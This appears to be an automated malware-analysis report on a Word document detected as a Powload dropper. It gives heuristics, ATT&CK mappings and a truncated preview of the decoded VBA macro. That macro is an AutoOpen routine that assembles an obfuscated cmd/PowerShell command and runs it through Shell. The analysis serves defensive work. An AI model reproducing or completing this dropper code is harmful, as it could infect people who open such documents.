MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is an OLE document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, a critical heuristic firing, to execute a command. The ClamAV detection 'Doc.Dropper.Powload-6922837-0' strongly suggests this macro is a dropper for a PowerShell-based payload. The obfuscated string concatenation within the VBA function 'dJwRHjsRcj' likely forms the command to be executed.
Heuristics 6
-
ClamAV: Doc.Dropper.Powload-6922837-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Powload-6922837-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7439 bytes |
SHA-256: 7beb1fdec2869eca13576290d88f6489e40ecf2a080b2f092ae91f536718e704 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zjbIpFtYOJuw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Hour zbMUu * JZEGP Hour 64504 / lDMwL Hour UaKczo / qzUiN Shell KeyString(0 + 8 + 4 + 8 + 47) + cbMGaUjsAj + irZBLrn + dJwRHjsRcj + CTTESlWL + HwpKXAmui + HZnpzOZr + ENFGBFvHjC + XwkIntoqLFiu, 19 - 19 Hour 75293 / 71178 Hour 57983 / QHsot Hour tdLnTa * DXOHAZ End Sub Attribute VB_Name = "wEKziKaTLSvsiH" Function dJwRHjsRcj() On _ Error _ Resume _ Next Hour 33258 * SNVQi Hour OTLkk / CTtiAf / 60663 * KCIchM Kmkcci = "md" + " /V:/C" + Chr(2 + 5 + 2 + 3 + 22) + "^s^et" + " F^9==" + "=^AAgAA" + "I^AA" + "C^A" + "gAAI^A^" + "ACA^g" Hour 43346 * scHfh Hour SqYoSD * 32535 Hour bfnLk / lXHKNn mFaAPsbw = "^A^A" + "IA^AC^A" + "g^AAIA" + "^" + "A" + "C^A" + "g" Hour 4161 / 66307 / CsIUWm / vipHHs Hour 66328 * WfLUJK / 62842 / dXwQj Hour zNlisK * QqjYW * vRoWG * AYUwE Hour 2918 / wSiPh Hour PCliP * LWonQ / pmibR * wPaARB qKUratFa = "^" + "AAI" + "^A" + "^" + "AC^A^g^" + "A" + "AIA^" Hour NFdjP * ktOrND / YjnHq * 15450 Hour RoFut / dmlncV * BbGzfl / SGSzdz mGvwHElTL = "0^HA9" + "B" + "^weA^" + "g^G" + "^A^jB" + "A^d" + "^A^E^" + "GAj" + "^B^QfA" + "s^D^" + "ArBQ^YA" Hour pVzHH / 55596 / khhWI * ILWCnK Hour KnmKd / MvQjj * 58092 * hrwIl Hour 20668 * sOAww Hour Qwhpb / vNUfFK Hour 30219 * ZQSfA / XMBQz / wBjPdh JMjfdYAjs = "U^GAyB" + "^" + "g^YA^s^" + "D^" + "A^t^B^Q" + "U^AME" + "^Ak^AAI" + "^A^0" + "^GAlBAd" Hour 43807 * QTlkW Hour 4768 * 61504 Hour 39826 / zJzbOV Hour 60259 / FpjOTi ARsBiYpU = "^Ak^" + "EA^t^A" + "QZA" + "sG" + "A" + "v^B^g" + "^dA" + "4" + "G^" dJwRHjsRcj = Kmkcci + mFaAPsbw + qKUratFa + mGvwHElTL + JMjfdYAjs + ARsBiYpU Hour 38078 * 7359 Hour QZiNnr / izhqE / 22480 / DLntkW Hour 61048 / 6752 Hour IhZuB * iwjiMQ / 23648 * zFCGlQ End Function Function CTTESlWL() On _ Error _ Resume _ Next Hour coiQA / nCnfC * fZIjAC / TrjHYO Hour 80157 / wnhwk Hour RzJSt / 74051 aLftOcC = "AJ^BwO" + "AkCAt" + "^B^QU^A" + "^M" + "^EA^" + "k" + "A^A^IA" + "^wC" + "AC" + "^B^AS^" + "AIHA^" + "k^A^A^K" Hour 98313 / KpnEh * 92490 / tawjJC Hour 30292 / jDwArw PwXwpLjlnk = "A^" + "UG" + "As" + "^B" + "Q^" + "a^" + "A^" + "Y^E^A^" + "k^B" + "Q^Y^A" Hour 85535 / TwrTA Hour imEdo * iqfud Hour 43049 * iMIsQ Hour ZrYdd / bWAsoR Hour OzBaaM * jLsQs * 13106 / qIzbu tNaKm = "^8" + "^GA" + "s^" + "B^g^b^A" + "cHAv^B" Hour 34088 / FTjTu Hour 27137 / qCWSwE Hour 79491 * mpLRl / LizhzN * 48916 Hour hOohfS / mMYkPl / uiAzN * KJqQK iIHZGNIUwmm = "ARA^4" + "C^A" + "wBA" + "b^AQHAk" + "^A^we^A" + "^kHA" + "^" + "y^B^AdA" + "^sHApA^" + "Q^a^AQF" Hour zEuvK / RQjkr * 63119 * SBBPYB Hour VzblX / zPSHk Hour BjMPvl * pjjzKo / 67984 / jWZYY Hour BOiBSC / biFiai XjWvK = "A^2BA" + "JA^AC" + "Au^B^Q" + "a^A^" + "ACAC" + "B^AS" + "A^" Hour 3550 / NGUktj / wPEIC / 98294 Hour KAXvw * pPurAj RMREm = "IH^AkAA" + "KA^g^G^" + "Aj^" + "BQYAU" + "^" + "G" + "AyB^w^" + "bA^" + "Y^" Hour 57807 / kFBPQl Hour 65966 * GGUFH / hnSFFj * 72731 Hour 91366 * 6626 PDqwknQ = "GA" + "^7A^wJ" + "^" + "AU^G" + "^A^4^" + "BQZ^A4C" + "^An^" + "A^" + "w" + "^" Hour 18166 / dNiEO * sSkUS / Bzntt Hour 77769 / qDAJwZ * 65370 * ZFcmwb Hour 4930 / anRwQ / 22632 / 99539 bQqzRwwpptn = "K^A^UEA" + "^ZB^QU" + "^A^QC^" + "ArAw" + "^" + "J^" + "A^w" + "^F" Hour PIXGp / DAXEmq Hour 11131 * kZMjHo / jjQJqh * nhcAa Hour KOmqd / KocwHq Hour oCGUpQ * 21105 * mLWJi / 9377 Hour 76345 / ztMWL * fKwBSG * RjBhN kZrvIBbcjiX = "An^A^" + "w^KA^" + "MGAp" + "BA^" + "bAIG^A1" + "^B" + "A" + "c^Ao" + "^D" + "A2B^" + "gb" + "A^U^G" Hour EZPJj * TUlcJE Hour McDvw * wREBCD / cCzSpP / wlDjji Hour 10825 * BNEHi Hour IYbCV / 96434 Hour 79496 / ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.